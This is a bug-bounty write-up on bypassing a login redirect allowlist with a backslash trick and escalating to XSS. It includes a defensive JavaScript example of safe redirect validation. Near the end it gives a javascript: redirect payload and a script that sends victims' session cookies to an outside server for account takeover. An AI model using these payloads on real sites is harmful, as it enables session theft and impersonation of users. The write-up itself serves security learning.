Open Redirect >> XSS
How I found Open Redirect which could be escalated to XSS and potential Account takeover
I was hunting for IDORs for a really long time on this particular target, but it was quite secure against IDOR. I was trying to make an unauthenticated action on an account with another account to get horizontal privilege escalation through IDOR. But it redirected to the login page for confirming authentication. 😐
However, I noticed that the login URL was something like: https://target.com/login?next=/endpoint
So now I have a new parameter to test 💯 I started the XSS automation in the background on this endpoint. Then I started testing for Open Redirect.
On logging in through https://target.com/login?next=https://google.com it was not redirecting, but on logging in using https://target.com/login?next=/profile, it was redirecting to the user profile.
This means that whitelisting is being used, i.e. redirection is only allowed on *.target.com. I did some research on how to bypass such restrictions. Then I came to my all-time favorite repository for payloads: github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Open%20Redirect#filter-bypass
I tried these whitelisting filter bypass techniques one by one, and after many tries I logged in using: https://target.com/login?next=\/\/google.com/ As soon as I logged in, it redirected me to google.com 🔥
The significance of "\/\/" is that the browser treats "\" as equivalent to "/", so "\/\/google.com/" is parsed as "//google.com/", a protocol-relative URL pointing at google.com, whereas the server-side whitelist check did not recognise it as an external host.
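As an added example (not code from the original post), the snippet below contrasts a naive host allowlist of the kind described here, which lets "\/\/google.com/" through, with how Node's WHATWG URL parser (the same rules browsers apply) resolves that value, and a hardened check that validates the browser-resolved origin instead. The site origin and login path are placeholders, and the target's real server-side filter is unknown.

```javascript
// Added example, not code from the original post. The site origin, login
// path and the naive filter are assumptions standing in for the real target.
const SITE_ORIGIN = 'https://target.example';
const LOGIN_URL = SITE_ORIGIN + '/login';

// A naive allowlist: split the value RFC 3986-style and allow it when there
// is no host or the host is ours. "\/\/google.com/" has neither a scheme nor
// a leading "//", so it looks like a local path to this check.
function naiveIsAllowed(next) {
  const m = /^(?:[a-z][a-z0-9+.-]*:)?(?:\/\/([^/?#]*))?/i.exec(next);
  const host = (m[1] || '').toLowerCase();
  return host === '' || host === 'target.example' || host.endsWith('.target.example');
}

// Resolve `next` the way a browser resolves a Location header: relative to
// the page that issued the redirect, using the WHATWG parser (Node's URL),
// which treats "\" like "/" for http(s) URLs. Returns null when unparsable.
function resolveLikeBrowser(next, base = LOGIN_URL) {
  try {
    return new URL(next, base);
  } catch (_) {
    return null;
  }
}

// Hardened check: reject backslashes and control characters outright, then
// require that the browser-resolved URL still has our origin (scheme, host,
// port). A javascript: value gets the opaque origin 'null' and is rejected.
function isSafeRedirect(next) {
  if (typeof next !== 'string' || next === '') return false;
  if (/[\\\x00-\x1f\x7f]/.test(next)) return false;
  const resolved = resolveLikeBrowser(next);
  return resolved !== null && resolved.origin === SITE_ORIGIN;
}

// What the login handler should send in Location: the resolved same-origin
// URL, or a fixed fallback when the value fails the check.
function redirectTarget(next) {
  return isSafeRedirect(next) ? resolveLikeBrowser(next).href : SITE_ORIGIN + '/';
}
```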
This can be escalated further to XSS. The same bypass works with a javascript: URL, for example: ?next=\/\/javascript%3A%2F%2F%250Aalert(document.domain); Host a script like the following on your server that extracts user cookies:
<script>
alert(document.cookie);
var i=new Image;
i.src="http://192.168.0.18:8888/?"+document.cookie;
</script>
When a user logs in using this link, you will get their session cookies on your server. To learn more about this, refer to: https://github.com/s0wr0b1ndef/xss-reflected-steal-cookie.md You can then use these cookies to impersonate the user. Full account takeover 🥳
Hope you liked it :). Feedback is always welcome.